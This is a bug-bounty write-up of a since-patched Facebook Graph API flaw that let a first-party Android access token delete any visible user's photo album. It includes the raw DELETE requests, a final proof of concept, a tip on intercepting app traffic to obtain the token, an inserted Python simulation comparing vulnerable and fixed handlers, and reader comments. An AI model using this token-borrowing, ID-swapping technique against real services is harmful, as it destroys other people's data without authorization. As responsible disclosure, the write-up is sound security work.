Deleting any photo albums – How I Hacked Your Facebook Photos

What if your photos get deleted without your knowledge?

That would be pretty upsetting, wouldn’t it? This post is about a vulnerability I found that allowed malicious users to delete any photo album on Facebook. Any photo album owned by a user, a page, or a group could be deleted.

Graph API is the primary way for developers to read and write user data. All Facebook apps currently use Graph API. In general, Graph API requires an access token to read or write user data. Read more about Graph API here.

According to Facebook’s developer documentation, photo albums cannot be deleted using the album node in Graph API.

I tried to delete one of my photo albums using a Graph Explorer access token.

Request:

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEd.....MUZD

Response:

{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because the Graph Explorer application does not have the capability to delete photo albums. Note the wording of the error, though: the capability is checked per application. That implies the endpoint exists and that some application, presumably one of Facebook's own, does have the capability to make this API call.

So I tried a Facebook mobile access token, since tokens issued to Facebook's first-party apps carry extra permissions that third-party apps cannot request. The Facebook mobile apps talk to the same Graph API, so I took the ID of one of my own albums and my Facebook for Android access token and repeated the request.

Request:

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:

true

Album 518171421550249 was deleted. The next step was to find out whether the endpoint checked ownership at all: I took the ID of an album belonging to a victim (one I could see but did not own) and sent the same request, to test for an insecure direct object reference (IDOR). I was very curious to see the result.

Request:

DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:

true

To my surprise, the victim's album was deleted, confirming the IDOR: the endpoint checked which application the token belonged to, but not whether the token's user owned the album. With nothing more than an album ID, I could delete any of your Facebook photo albums that I was able to see (public albums, or albums shared with me), regardless of who owned them.
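The authorization flaw behind the three requests above, modelled as an added example. This is not Facebook's code and not the fix Facebook deployed: it is a toy Graph-API-style DELETE /{album_id} handler in which every token, app ID, album ID and error body is constructed for illustration (only the "(#200)" capability error text is taken from the post), with a vulnerable handler that checks the application's capability but never the album's owner beside a hardened one that adds the missing object-level check.

```python
# Added example (not Facebook's code): a toy model of a Graph-API-style
# DELETE /{album_id} handler with the authorization flaw the post describes.
# Every token, app ID, album ID and error body below is constructed for
# illustration; only the "(#200)" capability error text comes from the post.
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    app_id: str    # application the token was issued to
    user_id: str   # user the token acts on behalf of


# Constructed access tokens (real tokens are opaque strings).
TOKENS = {
    "CAACEd.....MUZD": Token("graph_explorer", "attacker"),      # third-party app token
    "ANDROID_TOKEN_ATTACKER": Token("fb_android", "attacker"),  # first-party app token
}

# Constructed per-application capabilities: only the first-party app may delete albums.
APP_CAPABILITIES = {
    "graph_explorer": frozenset(),
    "fb_android": frozenset({"delete_album"}),
}

# Constructed album store: album_id -> owner user_id.
ALBUMS = {
    "518171421550249": "attacker",   # the author's own album ID from the post
    "900000000000001": "victim",     # constructed victim album
}
VICTIM_ALBUM = "900000000000001"

ERR_NO_CAPABILITY = {"error": {
    "message": "(#200) Application does not have the capability to make this API call.",
    "type": "OAuthException", "code": 200}}
ERR_BAD_TOKEN = {"error": {"message": "Invalid access token.", "code": 190}}                 # constructed
ERR_NOT_FOUND = {"error": {"message": "Album not found.", "code": 404}}                      # constructed
ERR_NOT_OWNER = {"error": {"message": "Token user does not own this album.", "code": 403}}  # constructed


def _capability_check(access_token):
    """Shared prefix of both handlers: resolve the token and check the app capability."""
    tok = TOKENS.get(access_token)
    if tok is None:
        return None, ERR_BAD_TOKEN
    if "delete_album" not in APP_CAPABILITIES[tok.app_id]:
        return None, ERR_NO_CAPABILITY
    return tok, None


def delete_album_vulnerable(albums, album_id, access_token):
    """Checks *which app* made the call but never *who owns* the album (IDOR)."""
    tok, err = _capability_check(access_token)
    if err:
        return err
    if album_id not in albums:
        return ERR_NOT_FOUND
    del albums[album_id]   # owner is never compared with tok.user_id
    return True


def delete_album_fixed(albums, album_id, access_token):
    """Same flow plus the missing object-level check: the token's user must own the album."""
    tok, err = _capability_check(access_token)
    if err:
        return err
    if album_id not in albums:
        return ERR_NOT_FOUND
    if albums[album_id] != tok.user_id:
        return ERR_NOT_OWNER
    del albums[album_id]
    return True


def run_scenario(handler):
    """Replay the post's three requests against a fresh copy of the album store.

    Returns (third-party token result, own album result, victim album result,
    albums left afterwards).
    """
    albums = dict(ALBUMS)
    r1 = handler(albums, "518171421550249", "CAACEd.....MUZD")         # Graph Explorer token
    r2 = handler(albums, "518171421550249", "ANDROID_TOKEN_ATTACKER")  # own album, first-party token
    r3 = handler(albums, VICTIM_ALBUM, "ANDROID_TOKEN_ATTACKER")       # victim's album, same token
    return r1, r2, r3, albums


if __name__ == "__main__":
    for name, handler in (("vulnerable", delete_album_vulnerable), ("fixed", delete_album_fixed)):
        r1, r2, r3, left = run_scenario(handler)
        print(f"{name}: explorer->{r1['error']['code']}, own->{r2}, victim->{r3}, left={left}")
```

The vulnerable handler reproduces the post exactly: the third-party token is refused with the (#200) error, the first-party token deletes the attacker's own album, and the same first-party token deletes the victim's album too. The hardened handler returns the same two results for the first two requests and refuses the third, which is the IDOR probe a tester should run against any object-level endpoint: take a token for user A and a resource ID belonging to user B, and confirm the server rejects the pair.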

I immediately reported this bug to the Facebook security team. They were very quick to confirm the issue and had a fix in place less than 2 hours after acknowledging the report.

A Facebook for Android access token can be obtained by intercepting the app's traffic; see [Capture Android HTTP/HTTPS Traffic].

Final Proof of Concept:

Request:

DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you aren't sure how to do it, please see this video [How I Hacked Your Public Facebook Photos].

Acknowledgement of fix and reward of $12,500 USD for reporting this vulnerability.


This vulnerability is completely fixed now.

I thank the Facebook Security Team for running a bug bounty program and for quickly fixing this issue.

HALL OF FAME: https://www.facebook.com/whitehat/thanks

Laxman Muthiyah Facebook Whitehat Hacker Updated List 2015


55 Comments

  1. Awesome job bro…

    I'm very happy to hear that there are some good whitehats in India too.
    Congrats.

    Can you suggest some great free online places to learn web development?

  2. Wow, so simple but so nice! It's incredible… I mean, of course you're really smart and this was a great hack, but everybody could do this in a few hours without a huge amount of knowledge! That's so surprising!
    You were also able to delete posts and publish, right?

  3. Hello.. I'm in a big problem and I hope I will get a solution from this site.. Actually my friend's Facebook profile has been hacked.. Somebody has created a public page with her name which contains all her pictures and posts.. Every time she posts or puts pictures on her Facebook page, that public page also does the same.. That page is not genuine and contains very bad comments in it.. And the big problem is it contains my picture too.. I want to know how to delete my picture from that page because I don't want it to remain there.. Also how can we delete that page?? Please help me.. This is a big trouble for a girl..

  4. Hello.. I am in a big problem and I hope I will get a solution from this site.. Actually my friend's Facebook profile has been hacked.. Somebody has created a public page with her name which contains all her pictures and posts.. Every time she posts or puts pictures on her Facebook page, that public page also does the same.. That page is not genuine and contains very bad comments in it.. And the big problem is it contains my picture too.. I want to know how to delete my picture from that page because I don't want it to remain there.. Also how can we delete that page?? Please help me…..

  5. Virtually, you can use this method to delete any photo albums that belong to a user who has registered with your Facebook app, not any Facebook user.

  6. Nice find. Keep inspiring people. 🙂 I have one silly question, and I hope I will get the answer. I cannot understand how it is showing "Facebook for Android" with an app ID in the APP ID section on your access token page.
    I actually created one Facebook page long ago and it is showing that page's app ID on the access token page.
